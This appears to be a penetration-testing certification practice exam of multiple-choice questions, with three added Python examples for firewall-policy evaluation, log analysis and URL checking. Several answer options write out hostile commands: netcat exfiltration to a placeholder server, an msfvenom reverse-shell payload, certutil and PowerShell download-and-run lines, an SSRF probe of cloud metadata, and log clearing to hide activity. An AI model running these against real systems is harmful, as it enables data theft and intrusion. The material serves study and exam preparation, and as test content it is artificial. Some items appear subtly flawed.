pt003

The document presents a series of questions and scenarios related to penetration testing, covering various techniques, tools, and best practices. It includes topics such as data exfiltration methods, vulnerability assessment tools, security controls, and attack strategies. Each question is designed to assess knowledge and decision-making in the field of cybersecurity.

Uploaded by sbonso23

1. During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence.

Which of the following is the best way for the penetration tester to hide the activities performed?

Clear the Windows event logs.
Modify the system time.
Alter the log permissions.
Reduce the log retention settings.
2. A tester enumerated a firewall policy and now needs to stage and exfiltrate data captured from the engagement.

Given the following firewall policy:

Action | SRC | DEST | Protocol
Block | 192.168.10.0/24:1-65535 | 10.0.0.0/24:22 | TCP
Allow | 0.0.0.0/0:1-65535 | 192.168.10.0/24:443 | TCP
Allow | 192.168.10.0/24:1-65535 | 0.0.0.0/0:443 | TCP
Block | * | * | *

Which of the following commands should the tester try next?

tar -zcvf /tmp/data.tar.gz /path/to/data && nc -w 3 <remote_server> 443 < /tmp/data.tar.gz
gzip /path/to/data && cp data.gz <remote_server> 443
gzip /path/to/data && nc -nvlk 443; cat data.gz | nc -w 3 <remote_server> 22
tar -zcvf /tmp/data.tar.gz /path/to/data && scp /tmp/data.tar.gz <remote_server>
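A policy like the one above can be evaluated mechanically to see which outbound paths it actually leaves open for a host in 192.168.10.0/24, which is how a defender verifies that a default-deny egress rule set is as tight as intended. The following is an added example, not part of the question set: a first-match evaluator whose policy rows are copied from the table and whose sample addresses (192.168.10.5, 10.0.0.9, 203.0.113.7) are constructed.

```python
import ipaddress
from dataclasses import dataclass

# Policy rows constructed from the table in the question (header omitted).
POLICY_TEXT = """
Block | 192.168.10.0/24:1-65535 | 10.0.0.0/24:22      | TCP
Allow | 0.0.0.0/0:1-65535       | 192.168.10.0/24:443 | TCP
Allow | 192.168.10.0/24:1-65535 | 0.0.0.0/0:443       | TCP
Block | *                       | *                   | *
"""


@dataclass
class Rule:
    action: str
    src_net: ipaddress.IPv4Network
    src_ports: range
    dst_net: ipaddress.IPv4Network
    dst_ports: range
    proto: str  # "TCP", "UDP" or "*"


def _parse_endpoint(spec):
    """'192.168.10.0/24:1-65535' or '*' -> (network, inclusive port range)."""
    if spec == "*":
        return ipaddress.ip_network("0.0.0.0/0"), range(1, 65536)
    net, _, ports = spec.rpartition(":")  # the last ':' separates the port spec
    lo, _, hi = ports.partition("-")
    return ipaddress.ip_network(net), range(int(lo), int(hi or lo) + 1)


def parse_policy(text):
    rules = []
    for line in text.strip().splitlines():
        action, src, dst, proto = [col.strip() for col in line.split("|")]
        src_net, src_ports = _parse_endpoint(src)
        dst_net, dst_ports = _parse_endpoint(dst)
        rules.append(Rule(action, src_net, src_ports, dst_net, dst_ports, proto))
    return rules


def evaluate(rules, src_ip, src_port, dst_ip, dst_port, proto):
    """First matching rule wins; a flow that matches nothing is denied."""
    src, dst = ipaddress.ip_address(src_ip), ipaddress.ip_address(dst_ip)
    for r in rules:
        if (r.proto in ("*", proto) and src in r.src_net and src_port in r.src_ports
                and dst in r.dst_net and dst_port in r.dst_ports):
            return r.action
    return "Block"


def open_egress_ports(rules, src_ip, dst_ip, proto="TCP", ports=(22, 80, 443, 8443)):
    """Destination ports on dst_ip that src_ip may reach under the policy."""
    return [p for p in ports if evaluate(rules, src_ip, 40000, dst_ip, p, proto) == "Allow"]


if __name__ == "__main__":
    rules = parse_policy(POLICY_TEXT)
    print(open_egress_ports(rules, "192.168.10.5", "203.0.113.7"))  # [443]
```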
3. Which of the following elements in a lock should be aligned to a specific level to allow
the key cylinder to turn?

Latches
Pins
Shackle
Plug
4. A penetration tester assesses an application allow list and has limited command-line
access on the Windows system.

Which of the following would give the penetration tester information that could aid in
continuing the test?

mmc.exe
icacls.exe
nltest.exe
rundll.exe
5. A penetration tester wants to use multiple TTPs to assess the reactions (alerted,
blocked, and others) by the client’s current security tools. The threat-modeling team
indicates the TTPs in the list might affect their internal systems and servers.

Which of the following actions would the tester most likely take?

Use a BAS tool to test multiple TTPs based on the input from the threat-modeling team.
Perform an internal vulnerability assessment with credentials to review the internal attack
surface.
Use a generic vulnerability scanner to test the TTPs and review the results with the threat-
modeling team.
Perform a full internal penetration test to review all the possible exploits that could affect the
systems.
6. As part of a security audit, a penetration tester finds an internal application that accepts
unexpected user inputs, leading to the execution of arbitrary commands.

Which of the following techniques would the penetration tester most likely use to access
the sensitive data?

Logic bomb
SQL injection
Brute-force attack
Cross-site scripting
7. A penetration tester identifies an exposed corporate directory containing first and last
names and phone numbers for employees.

Which of the following attack techniques would be the most effective to pursue if the
penetration tester wants to compromise user accounts?

Smishing
Impersonation
Tailgating
Whaling
8. A penetration tester is compiling the final report for a recently completed engagement.
A junior QA team member wants to know where they can find details on the impact,
overall security findings, and high-level statements.

Which of the following sections of the report would most likely contain this information?

Quality control
Methodology
Executive summary
Risk scoring
9. A tester completed a report for a new client.

Prior to sharing the report with the client, which of the following should the tester request
to complete a review?

A generative AI assistant
The customer's designated contact
A cybersecurity industry peer
A team member
10. During an assessment, a penetration tester exploits an SQLi vulnerability.

Which of the following commands would allow the penetration tester to enumerate
password hashes?

sqlmap -u www.example.com/?id=1 --search -T user
sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred
sqlmap -u www.example.com/?id=1 --tables -D accounts
sqlmap -u www.example.com/?id=1 --schema --current-user --current-db
11. During an assessment, a penetration tester obtains an NTLM hash from a legacy
Windows machine.

Which of the following tools should the penetration tester use to continue the attack?

Responder
Hydra
BloodHound
CrackMapExec
12. A penetration tester needs to collect information over the network for further steps in
an internal assessment.

Which of the following would most likely accomplish this goal?

ntlmrelayx.py -t 192.168.1.0/24 -1 1234
nc -tulpn 1234 192.168.1.2
responder.py -I eth0 -wP
crackmapexec smb 192.168.1.0/24
13. A penetration tester wants to use the following Bash script to identify active servers
on a network:

1 network_addr="192.168.1"
2 for h in {1..254}; do
3     ping -c 1 -W 1 $network_addr.$h > /dev/null
4     if [ $? -eq 0 ]; then
5         echo "Host $h is up"
6     else
7         echo "Host $h is down"
8     fi
9 done

Which of the following should the tester do to modify the script?

Change the condition on line 4.
Add 2>&1 at the end of line 3.
Use seq on the loop on line 2.
Replace $h with ${h} on line 3.
14. A penetration tester is attempting to discover vulnerabilities in a company's web
application.

Which of the following tools would most likely assist with testing the security of the web
application?

OpenVAS
Nessus
sqlmap
Nikto
15. A penetration tester needs to launch an Nmap scan to find the state of the port for
both TCP and UDP services.

Which of the following commands should the tester use?

nmap -sU -sW -p 1-65535 example.com
nmap -sU -sY -p 1-65535 example.com
nmap -sU -sT -p 1-65535 example.com
nmap -sU -sN -p 1-65535 example.com
16. A tester plans to perform an attack technique over a compromised host.

The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml.

Which of the following commands would most likely be used by the tester to continue with the attack on the host?

regsvr32 /s /n /u C:\evil.xml
MSBuild.exe C:\evil.xml
mshta.exe C:\evil.xml
AppInstaller.exe C:\evil.xml
17. A tester performs a vulnerability scan and identifies several outdated libraries used
within the customer SaaS product offering.

Which of the following types of scans did the tester use to identify the libraries?

IAST
SBOM
DAST
SAST
18. A penetration tester performs an assessment on the target company's Kubernetes
cluster using kube-hunter.

Which of the following types of vulnerabilities could be detected with the tool?

Network configuration errors in Kubernetes services
Weaknesses and misconfigurations in the Kubernetes cluster
Application deployment issues in Kubernetes
Security vulnerabilities specific to Docker containers
19. A penetration tester needs to confirm the version number of a client's web application
server.

Which of the following techniques should the penetration tester use?

SSL certificate inspection
URL spidering
Banner grabbing
Directory brute forcing
20. Given the following statements:

Implement a web application firewall.

Upgrade end-of-life operating systems.

Implement a secure software development life cycle.

In which of the following sections of a penetration test report would the above statements
be found?

Executive summary
Attack narrative
Detailed findings
Recommendations
21. During a penetration test, a tester captures information about an SPN account.

Which of the following attacks requires this information as a prerequisite to proceed?

Golden Ticket
Kerberoasting
DCShadow
LSASS dumping
22. A penetration tester attempts to run an automated web application scanner against a
target URL. The tester validates that the web page is accessible from a different device.

The tester analyzes the following HTTP request header logging output:

200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0
200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0
No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl
200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0
No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python

Which of the following actions should the tester take to get the scans to work properly?

Modify the scanner to slow down the scan.
Change the source IP with a VPN.
Modify the scanner to only use HTTP GET requests.
Modify the scanner user agent.
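Logging output like the above can be checked mechanically for which request attribute correlates with the dropped requests, which is also how a defender confirms that a User-Agent filter on the WAF is doing what it was configured to do. The following is an added example, not from the question set: it parses constructed copies of the five log lines and tests whether method, path, or User-Agent alone accounts for every "No response".

```python
import re
from collections import Counter, defaultdict

# Log lines constructed to match the output shown in the question.
LOG_LINES = [
    "200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0",
    "200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0",
    "No response; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: curl",
    "200; POST /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0",
    "No response; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: python",
]

LINE_RE = re.compile(
    r"^(?P<status>[^;]+); (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01] "
    r"Host: (?P<host>[^;]+); User-Agent: (?P<ua>.+)$"
)


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised log line: {line!r}")
    rec = m.groupdict()
    rec["answered"] = rec["status"] != "No response"
    return rec


def outcomes_by(lines, field):
    """Count answered/dropped requests per distinct value of `field`."""
    table = defaultdict(Counter)
    for rec in map(parse_line, lines):
        table[rec[field]]["answered" if rec["answered"] else "dropped"] += 1
    return {k: dict(v) for k, v in table.items()}


def field_explains_drops(lines, field):
    """True when every value of `field` is either always answered or always dropped."""
    seen = {}
    for rec in map(parse_line, lines):
        if seen.setdefault(rec[field], rec["answered"]) != rec["answered"]:
            return False
    return True


def dropped_agents(lines):
    """User agents that never received a response."""
    return sorted(ua for ua, c in outcomes_by(lines, "ua").items() if not c.get("answered"))


if __name__ == "__main__":
    for field in ("method", "path", "ua"):
        print(f"{field}: {field_explains_drops(LOG_LINES, field)}")  # only ua -> True
    print(dropped_agents(LOG_LINES))  # ['curl', 'python']
```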
23. During a penetration test, a junior tester uses Hunter.io for an assessment and plans
to review the information that will be collected.

Which of the following describes the information the junior tester will receive from the
Hunter.io tool?

A collection of email addresses for the target domain that is available on multiple sources on
the internet
DNS records for the target domain and subdomains that could be used to increase the
external attack surface
Data breach information about the organization that could be used for additional
enumeration
Information from the target's main web page that collects usernames, metadata, and
possible data exposures
24. A penetration tester downloads a JAR file that is used in an organization's production
environment. The tester evaluates the contents of the JAR file to identify potentially
vulnerable components that can be targeted for exploit.

Which of the following describes the tester's activities?

SAST
SBOM
ICS
SCA
25. During a penetration testing engagement, a tester targets the internet-facing services
used by the client.

Which of the following describes the type of assessment that should be considered in this
scope of work?

Segmentation
Mobile
External
Web
26. A penetration tester has just started a new engagement. The tester is using a
framework that breaks the life cycle into 14 components.

Which of the following frameworks is the tester using?

OWASP MASVS
OSSTMM
MITRE ATT&CK
CREST
27. A penetration tester is evaluating a SCADA system. The tester receives local access to
a workstation that is running a single application. While navigating through the
application, the tester opens a terminal window and gains access to the underlying
operating system.

Which of the following attacks is the tester performing?

Kiosk escape
Arbitrary code execution
Process hollowing
Library injection
28. A penetration tester presents the following findings to stakeholders:

Control | Number of findings | Risk | Notes
Encryption | 1 | Low | Weak algorithm noted
Patching | 8 | Medium | Unsupported systems
System hardening | 2 | Low | Baseline drift observed
Secure SDLC | 10 | High | Libraries have vulnerabilities
Password policy | 0 | Low | No exceptions noted

Based on the findings, which of the following recommendations should the tester make? (Select two).

Develop a secure encryption algorithm.
Deploy an asset management system.
Write an SDLC policy.
Implement an SCA tool.
Obtain the latest library version.
Patch the libraries.
29. While conducting a reconnaissance activity, a penetration tester extracts the following
information:

Emails: - [email protected] - [email protected] - [email protected]

Which of the following risks should the tester use to leverage an attack as the next step in
the security assessment?

Unauthorized access to the network
Exposure of sensitive servers to the internet
Likelihood of SQL injection attacks
Indication of a data breach in the company
30. A penetration tester gains access to a host but does not have access to any type of
shell.

Which of the following is the best way for the tester to further enumerate the host and the
environment in which it resides?

ProxyChains
Netcat
PowerShell ISE
Process IDs
31. A penetration tester has found a web application that is running on a cloud virtual
machine instance. Vulnerability scans show a potential SSRF for the same application
URL path with an injectable parameter.

Which of the following commands should the tester run to successfully test for secrets
exposure exploitability?

curl <url>?param=http://169.254.169.254/latest/meta-data/
curl '<url>?param=http://127.0.0.1/etc/passwd'
curl '<url>?param=<script>alert(1)<script>/'
curl <url>?param=http://127.0.0.1/
32. A penetration tester cannot find information on the target company's systems using
common OSINT methods. The tester's attempts to do reconnaissance against internet-
facing resources have been blocked by the company's WAF.

Which of the following is the best way to avoid the WAF and gather information about the
target company's systems?

HTML scraping
Code repository scanning
Directory enumeration
Port scanning
33. During a penetration test, the tester uses a vulnerability scanner to collect information
about any possible vulnerabilities that could be used to compromise the network.

The tester receives the results and then executes the following command:

snmpwalk -v 2c -c public 192.168.1.23

Which of the following is the tester trying to do based on the command they used?

Bypass defensive systems to collect more information.
Use an automation tool to perform the attacks.
Script exploits to gain access to the systems and host.
Validate the results and remove false positives.
34. A penetration tester is working on a security assessment of a mobile application that
was developed in-house for local use by a hospital. The hospital and its customers are
very concerned about disclosure of information.

Which of the following tasks should the penetration tester do first?

Set up Drozer in order to manipulate and scan the application.
Run the application through the mobile application security framework.
Connect Frida to analyze the application at runtime to look for data leaks.
Load the application on client-owned devices for testing.
35. Before starting an assessment, a penetration tester needs to scan a Class B IPv4
network for open ports in a short amount of time.

Which of the following is the best tool for this task?

Burp Suite
masscan
Nmap
hping
36. A penetration tester is performing an authorized physical assessment. During the test,
the tester observes an access control vestibule and on-site security guards near the entry
door in the lobby.

Which of the following is the best attack plan for the tester to use in order to gain access
to the facility?

Clone badge information in public areas of the facility to gain access to restricted areas.
Tailgate into the facility during a very busy time to gain initial access.
Pick the lock on the rear entrance to gain access to the facility and try to gain access.
Drop USB devices with malware outside of the facility in order to gain access to internal
machines.
37. During a web application assessment, a penetration tester identifies an input field that
allows JavaScript injection. The tester inserts a line of JavaScript that results in a prompt,
presenting a text box when browsing to the page going forward.
Which of the following types of attacks is this an example of?

SQL injection
SSRF
XSS
Server-side template injection
38. A penetration tester is working on an engagement in which a main objective is to
collect confidential information that could be used to exfiltrate data and perform a
ransomware attack. During the engagement, the tester is able to obtain an internal
foothold on the target network.

Which of the following is the next task the tester should complete to accomplish the
objective?

Initiate a social engineering campaign.
Perform credential dumping.
Compromise an endpoint.
Share enumeration.
39. During a penetration test, the tester identifies several unused services that are
listening on all targeted internal laptops.

Which of the following technical controls should the tester recommend to reduce the risk
of compromise?

Multifactor authentication
Patch management
System hardening
Network segmentation
40. A penetration tester writes the following script to enumerate a /24 network:

1 #!/bin/bash
2 for i in {1..254}; do
3     ping -c1 192.168.1.$i
4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token `ping'

Which of the following should the tester do to fix the error?

Add do after line 2.
Replace {1..254} with $(seq 1 254).
Replace bash with tsh.
Replace $i with ${i}.
41. A penetration tester gains initial access to an endpoint and needs to execute a
payload to obtain additional access.

Which of the following commands should the penetration tester use?

powershell.exe impo C:\tools\foo.ps1
certutil.exe -f https://192.168.0.1/foo.exe bad.exe
powershell.exe -noni -encode IE Downloadstring("http://172.16.0.1/")
rundll32.exe c:\path\foo.dll,functName
42. During a vulnerability assessment, a penetration tester configures the scanner sensor
and performs the initial vulnerability scanning under the client's internal network. The
tester later discusses the results with the client, but the client does not accept the results.
The client indicates the host and assets that were within scope are not included in the
vulnerability scan results.

Which of the following should the tester have done?

Rechecked the scanner configuration.
Performed a discovery scan.
Used a different scan engine.
Configured all the TCP ports on the scan.
43. Which of the following describes the process of determining why a vulnerability
scanner is not providing results?

Root cause analysis
Secure distribution
Peer review
Goal reprioritization
44. During a security audit, a penetration tester wants to run a process to gather
information about a target network's domain structure and associated IP addresses.

Which of the following tools should the tester use?

Dnsenum
Nmap
Netcat
Wireshark
45. During an external penetration test, a tester receives the following output from a tool:

test.comptia.org
info.comptia.org
vpn.comptia.org
exam.comptia.org

Which of the following commands did the tester most likely run to get these results?

nslookup -type=SOA comptia.org
amass enum -passive -d comptia.org
nmap -Pn -sV -vv -A comptia.org
shodan host comptia.org
46. A penetration tester is developing the rules of engagement for a potential client.

Which of the following would most likely be a function of the rules of engagement?

Testing window
Terms of service
Authorization letter
Shared responsibilities
47. A penetration tester needs to complete cleanup activities from the testing lead.

Which of the following should the tester do to validate that reverse shell payloads are no
longer running?

Run scripts to terminate the implant on affected hosts.
Spin down the C2 listeners.
Restore the firewall settings of the original affected hosts.
Exit from C2 listener active sessions.
48. A penetration testing team wants to conduct DNS lookups for a set of targets provided
by the client.

The team crafts a Bash script for this task.

However, they find a minor error in one line of the script:

1 #!/bin/bash
2 for i in $(cat example.txt); do
3     curl $i
4 done

Which of the following changes should the team make to line 3 of the script?

resolvconf $i
rndc $i
systemd-resolve $i
host $i
49. A penetration tester needs to test a very large number of URLs for public access.

Given the following code snippet:

1 import requests
2 import pathlib
3
4 for url in pathlib.Path("urls.txt").read_text().split("\n"):
5     response = requests.get(url)
6     if response.status == 401:
7         print("URL accessible")

Which of the following changes is required?

The condition on line 6
The method on line 5
The import on line 1
The delimiter in line 3
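As an added example (not the snippet from the question), here is a checker that handles the points the snippet gets wrong: it splits on real newlines and skips blank lines, treats only a 200 as publicly accessible (401 and 403 mean authentication is required), and keeps going when a URL does not answer at all. It uses the standard library's urllib instead of requests so it runs without third-party packages; the sample URL list and the status values in the test are constructed.

```python
import pathlib
import urllib.error
import urllib.request

# Constructed sample list; a real run reads urls.txt (see main below).
SAMPLE_URL_LIST = (
    "https://example.test/public\n"
    "\n"
    "https://example.test/admin\n"
    "https://example.test/missing\n"
)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Report 3xx responses as their own status instead of silently following them."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def load_urls(text):
    """Split on real newlines (backslash-n, not the letter n) and drop blank lines."""
    return [line.strip() for line in text.split("\n") if line.strip()]


def fetch_status(url, timeout=10):
    """HTTP status code for a GET, or None when no HTTP answer came back at all."""
    req = urllib.request.Request(url, headers={"User-Agent": "url-check/1.0"})
    try:
        with _OPENER.open(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:  # 3xx/4xx/5xx still carry a status code
        return err.code
    except (urllib.error.URLError, OSError):
        return None


def classify(status):
    """Only a 200 means the resource is publicly accessible."""
    if status is None:
        return "unreachable"
    if status == 200:
        return "public"
    if status in (401, 403):
        return "auth required"
    if 300 <= status < 400:
        return "redirect"
    return f"other ({status})"


def check_urls(urls, status_fn=fetch_status):
    """Map each URL to a verdict; status_fn is injectable so tests need no network."""
    return {url: classify(status_fn(url)) for url in urls}


if __name__ == "__main__":
    for url, verdict in check_urls(load_urls(pathlib.Path("urls.txt").read_text())).items():
        print(f"{verdict:14} {url}")
```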
50. As part of an engagement, a penetration tester wants to maintain access to a
compromised system after rebooting.

Which of the following techniques would be best for the tester to use?

Establishing a reverse shell
Executing a process injection attack
Creating a scheduled task
Performing a credential-dumping attack
